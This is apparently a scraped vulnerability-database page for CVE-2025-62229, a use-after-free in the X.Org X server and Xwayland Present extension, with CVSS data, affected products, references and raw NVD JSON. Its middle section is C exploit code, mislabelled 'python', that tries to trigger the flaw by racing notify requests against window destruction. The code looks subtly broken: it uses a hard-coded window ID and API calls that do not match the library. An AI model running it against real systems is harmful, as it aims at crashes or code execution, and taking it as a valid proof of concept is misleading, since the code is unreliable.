CVE-2025-62229

Description

A flaw was found in the X.Org X server and Xwayland when processing X11 Present extension notifications. Improper error handling during notification creation can leave dangling pointers that lead to a use-after-free condition. This can cause memory corruption or a crash, potentially allowing an attacker to execute arbitrary code or cause a denial of service.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

X.Org X Server < 21.1.14

Xwayland < 24.1.6

Red Hat Enterprise Linux 8.x (受影响)

Red Hat Enterprise Linux 9.x (受影响)

Fedora 40/41 (受影响)

Debian (部分版本受影响)

Ubuntu 24.04 LTS (可能受影响)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2025-62229: X.Org X Server Present Extension Use-After-Free
// Compile: gcc -o poc_cve202562229 poc_cve202562229.c -lX11

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <X11/Xlib.h>
#include <X11/extensions/Xpresent.h>

#define TARGET_WINDOW 0x12345678  // Target window ID

void trigger_uaf(Display *dpy) {
    int event_base, error_base;
    
    // Check if Present extension is available
    if (!XPresentQueryExtension(dpy, &event_base, &error_base)) {
        printf("[-] Present extension not available\n");
        return;
    }
    printf("[+] Present extension available\n");
    
    // Trigger the UAF condition through rapid notification creation
    for (int i = 0; i < 100; i++) {
        // Create PresentNotifyMSC request
        CARD32 options = 0;
        CARD64 target_msc = 0;
        CARD64 divisor = 0;
        CARD64 remainder = 0;
        
        // Rapid fire requests to trigger race condition
        PresentNotifyMSC(dpy, TARGET_WINDOW, options, target_msc, divisor, remainder);
        
        // Immediately destroy window to create dangling pointer
        XDestroyWindow(dpy, TARGET_WINDOW);
        XFlush(dpy);
        
        // Re-create window
        XCreateWindow(dpy, DefaultRootWindow(dpy), 0, 0, 800, 600, 0, 
                      CopyFromParent, InputOutput, CopyFromParent, 0, NULL);
    }
    
    printf("[+] UAF condition triggered\n");
}

int main(int argc, char *argv[]) {
    Display *dpy = XOpenDisplay(NULL);
    if (!dpy) {
        fprintf(stderr, "[-] Cannot open display\n");
        return 1;
    }
    
    printf("[+] Connecting to X server: %s\n", XDisplayName(NULL));
    trigger_uaf(dpy);
    
    XCloseDisplay(dpy);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62229
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62229
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62229/
[4] VulDB https://vuldb.com/cve/CVE-2025-62229
[5] https://access.redhat.com/errata/RHSA-2025:19432
[6] https://access.redhat.com/errata/RHSA-2025:19433
[7] https://access.redhat.com/errata/RHSA-2025:19434
[8] https://access.redhat.com/errata/RHSA-2025:19435
[9] https://access.redhat.com/errata/RHSA-2025:19489
[10] https://access.redhat.com/errata/RHSA-2025:19623
[11] https://access.redhat.com/errata/RHSA-2025:19909
[12] https://access.redhat.com/errata/RHSA-2025:20958
[13] https://access.redhat.com/errata/RHSA-2025:20960
[14] https://access.redhat.com/errata/RHSA-2025:20961

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62229", "sourceIdentifier": "[email protected]", "published": "2025-10-30T06:15:45.300", "lastModified": "2026-04-20T14:16:11.950", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the X.Org X server and Xwayland when processing X11 Present extension notifications. Improper error handling during notification creation can leave dangling pointers that lead to a use-after-free condition. This can cause memory corruption or a crash, potentially allowing an attacker to execute arbitrary code or cause a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:19432", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19433", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19434", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19435", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19489", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19623", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19909", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:20958", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:20960", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:20961", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21035", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22040", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22041", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22051", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22055", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22056", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22077", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22096", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22164", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22167", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22364", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22365", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22426", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22427", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22667", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22729", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22742", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22753", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0031", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0033", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0034", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0035", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0036", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-62229", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402649", "source": "[email protected]"}, {"url": "https://lists.x.org/archives/xorg-announce/2025-October/003635.html", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/28/7", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00033.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}